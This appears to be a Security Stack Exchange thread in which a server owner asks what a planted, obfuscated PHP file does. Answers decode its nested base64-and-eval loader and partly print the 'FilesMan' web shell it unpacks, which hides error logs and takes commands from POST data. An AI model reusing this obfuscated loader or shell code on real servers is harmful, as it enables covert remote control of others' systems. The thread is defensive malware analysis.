12

Can anyone help me to understand what this does? Someone has planted a file with this piece of code on my server. It is shortened because it cannot fit in the question, but it should give some idea of what it could be.

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); 
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
$O0O000O0O=$O0O000O00.$OOO000000{11};
$O0O000O00=$O0O000O00.$OOO000000{3};
$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
$_F=__FILE__;
$_X='Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0cjM1Ow0KJGQ1ZjEzbHRfY2gxcnM1dCA9ICdXNG5kMndzLTZhaTYnOw0KNGYgKHN0cnQybDJ3NXIoczNic3RyKFBIUF9PUywwLG8pKT09Inc0biIpDQogICAgJHN5cz0ndzRuJzsNCiA1bHM1DQogICAgJHN5cz0nM240eCc7DQogICAgDQokaDJtNV9jd2QgPSBAZzV0Y3dkKCk7DQo0Zig0c3M1dCgkX1BPU1RbJ2MnXSkpDQoJQGNoZDRyKCRfUE9TVFsnYyddKTsgICANCiAgICANCiRjd2QgPSBAZzV0Y3dkKCk7DQo0Zigkc3lzID09ICd3NG4nKSANCnsNCiAgICAkaDJtNV9jd2QgPSBzdHJfcjVwbDFjNSgiXFwiLCAiLyIsICRoMm01X2N3ZCk7DQoJJGN3ZCA9IHN0cl9yNXBsMWM1KCJcXCIsICIvIiwgJG......TVFsnMSddID0gJ0Y0bDVzTTFuJzsNCjRmKCAhNW1wdHkoJF9QT1NUWycxJ10pICYmIGYzbmN0NDJuXzV4NHN0cygnbTFkJyAuICRfUE9TVFsnMSddKSApDQoJYzFsbF8zczVyX2YzbmMoJ20xZCcgLiAkX1BPU1RbJzEnXSk7DQoJNXg0dDsNCj8+';
eval($OOO0000O0('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
?>
unor
user72138
    Besides truncating _X did you leave anything else off? Looks like there are obfuscated "fopen","fread", functions in addition to the "base64_decode" etc... I'm not seeing where those are used... – hft Apr 09 '15 at 22:43

3 Answers

14

You can decode the start of $_X:

root@bt:~# echo -e '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' | base64 -d -
?><?php

/**
 * @13th2r Ikr1m ALI
 * @c2pyr4ght a06a
 */
@d5f4n5('VERSION','6.0');
@5rr2r_r5p2rt4ng(E_ALL ^ E_NOTICE);
@s5ss42n_st1rt();
@4n4_s5t('5rr2r_l2g',NULL);
@4n4_s5t('l2g_5rr2rs',0);
@4n4_s5t('m1x_5x5c3t42n_t4m5',0);
@s5t_t4m5_l4m4t(0);
@s5t_m1g4c_q32t5s_r3nt4m5(0);

4f(g5t_m1g4c_q32t5s_gpc()) {
    f3nct42n m1dstr4psl1sh5s($1rr1y) {
        r5t3rn 4s_1rr1y($1rr1y) ? 1rr1y_m1p('m1dstr4psl1sh5s', $1rr1y) : str4psl1sh5s($1rr1y);
    }
    $_POST = m1dstr4psl1sh5s($_POST);
}
$d5f13lt_1ct42n = 'F4l5sM1n';
$d5f13lt_3s5_1j1x = tr35;
$d5f13lt_ch1rs5t = 'W4nd2ws-6ai6';
4f (strt2l2w5r(s3bstr(PHP_OS,0,o))=="w4n")
    $sys='w4n';
 5ls5
    $sys='3n4x';

$h2m5_cwd = @g5tcwd();
4f(4ss5t($_POST['c']))
    @chd4r($_POST['c']);   

$cwd = @g5tcwd();
4f($sys == 'w4n') 
{
    $h2m5_cwd = str_r5pl1c5("\\", "/", $h2m5_cwd);
    $cwd = str_r5pl1c5("\\", "/", $base64: invalid input

A quick google search reveals that it's a web shell and it has been decoded before: https://gist.github.com/smiler/4500976

In the eval line:

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==

This is base64 decoded to:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
RoraΖ
wireghoul
4

Once you format the code a little, like how I edited your question, it's easier to see what's going on.

$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64') translates to $OOO000000=fg6sbehpra4co_tnd

All of that is used to build the string:

$OOO0000O0=base64_decode

The eval section is base64 encoded and resolves to:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

As you can see, the $_X is also base64 encoded, but I can't decode it because you truncated it.

Translating it all, and removing the obfuscation, it becomes:

$_F=__FILE__;
$_X='<truncated>'
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

Without knowing what is in $_X, we cannot know what the ultimate goal is. The big question is if this PHP file was run after it was uploaded.

schroeder
2

I decoded the whole code by changing the eval function to var_dump. This gave me: string(133) "$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;" or formatted:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

I replaced the eval function in the file with this code. This code contains eval again. I replaced it again with var_dump and got the full decoded file:

<?php
/**
 * @author Ikram ALI
 * @copyright 2012
 */
@define('VERSION','1.0');
@error_reporting(E_ALL ^ E_NOTICE);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()) {
        function madstripslashes($array) {
                return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
        }
        $_POST = madstripslashes($_POST);
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
    $sys='win';
 else
    $sys='unix';

$home_cwd = @getcwd();
if(isset($_POST['c']))
        @chdir($_POST['c']);

$cwd = @getcwd();
if($sys == 'win')
{
    $home_cwd = str_replace("\\", "/", $home_cwd);

As you can see, the bottom part is missing. I assume that this is because you've only provided half of the script. Since the author of the script is provided I could find the whole code via Google here.

It is a shell. With this script, an attacker can view (and sometimes edit) files, execute commands, view server data, etc. I've even seen some scary functions like maddos(), madsql(), madPerms() in the shell uploaded to your server.

I advise removing this script and making sure nobody can get access to your FTP server anymore.

Tom